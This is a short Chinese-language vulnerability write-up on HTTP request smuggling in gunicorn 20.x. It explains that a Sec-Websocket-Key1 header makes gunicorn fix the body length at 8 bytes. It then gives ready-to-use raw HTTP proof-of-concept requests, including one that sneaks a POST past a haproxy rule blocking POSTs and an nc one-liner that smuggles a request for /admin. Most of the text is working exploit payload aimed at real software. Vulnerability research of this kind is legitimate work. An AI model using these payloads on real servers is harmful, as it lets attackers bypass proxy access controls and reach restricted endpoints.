gunicorn走私漏洞

• 源码：https://github.com/benoitc/gunicorn
• 漏洞定位：https://github.com/benoitc/gunicorn/blob/20.x/gunicorn/http/message.py#142

漏洞分析

只要header里面存在Sec-Websocket-Key1
那么就将content_length强制赋值为8
比较简单直接构造POC

POC

GET / HTTP/1.1
Host: example.com
Content-Length: 48
Sec-Websocket-Key1: x

xxxxxxxxGET /other HTTP/1.1
Host: example.com

gunicorn会认为上述请求是两个请求

GET / HTTP/1.1
Host: example.com
Content-Length: 48
Sec-Websocket-Key1: x

xxxxxxxx

和

GET /other HTTP/1.1
Host: example.com

但其他的代理服务器则会认为是一个请求，因为没有Sec-Websocket-Key1的逻辑

那么借此就可以绕过gunicorn之外的一些服务器的限制

利用

例如前端haproxy拒绝访问POST请求，但是gunicorn可以访问
则可以利用上述POC构造

GET / HTTP/1.1
Host: example.com
Content-Length: 48
Sec-Websocket-Key1: x

xxxxxxxxPOST /other HTTP/1.1
Host: example.com

关于Content-Length如何构造

burp开启自动更新则可以计算body的大小
关闭则可以自己repeat poc

或者使用命令行nc

echo -en "GET / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 68\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /admin HTTP/1.1\r\nHost: localhost\r\nContent-Length: 35\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc localhost 9999 

这里需要自己计算不同的content-length在不同的proxy中的请求体内容。